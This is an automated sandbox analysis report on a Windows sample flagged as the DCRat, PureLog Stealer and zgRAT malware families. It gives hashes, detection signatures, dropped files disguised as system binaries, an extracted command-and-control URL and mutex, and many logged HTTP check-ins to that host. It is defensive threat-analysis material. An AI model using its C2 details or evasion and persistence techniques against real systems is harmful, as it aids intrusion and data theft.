Windows Analysis Report
0JLWNg4Sz1.exe

Overview

General Information

Sample name: 0JLWNg4Sz1.exe
renamed because original name is a hash value
Original sample name: 844679E76D8254BEDD67C98610F7D7AC.exe
Analysis ID: 1545098
MD5: 844679e76d8254bedd67c98610f7d7ac
SHA1: 4222ebbb055830096b829f072783423dbe255932
SHA256: 9b08f03985d3378123ba236fae1b41b42fcc9af87932655a5120e04fa9a21942
Tags: DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Creates processes via WMI
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: 0JLWNg4Sz1.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\oLZ05R153F.bat Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Recovery\StartMenuExperienceHost.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Found malware configuration
Source: 00000000.00000002.1708169450.0000000013471000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: DCRat {"C2 url": "http://977255cm.nyashkoon.in/secureWindows", "MUTEX": "DCR_MUTEX-sKFQIzXKnAf7PnSalSzG"}
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe ReversingLabs: Detection: 65%
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe ReversingLabs: Detection: 65%
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe ReversingLabs: Detection: 65%
Source: C:\Recovery\DViaOgnvmAhwCXZ.exe ReversingLabs: Detection: 65%
Source: C:\Recovery\StartMenuExperienceHost.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\ALzNWdSZ.log ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\KjTCumlu.log ReversingLabs: Detection: 23%
Multi AV Scanner detection for submitted file
Source: 0JLWNg4Sz1.exe ReversingLabs: Detection: 65%
Source: 0JLWNg4Sz1.exe Virustotal: Detection: 56% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Joe Sandbox ML: detected
Source: C:\Recovery\StartMenuExperienceHost.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: 0JLWNg4Sz1.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: 0JLWNg4Sz1.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 0JLWNg4Sz1.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File opened: C:\Users\user\AppData\Local Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49730 -> 188.114.96.3:80
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 384Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1312Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
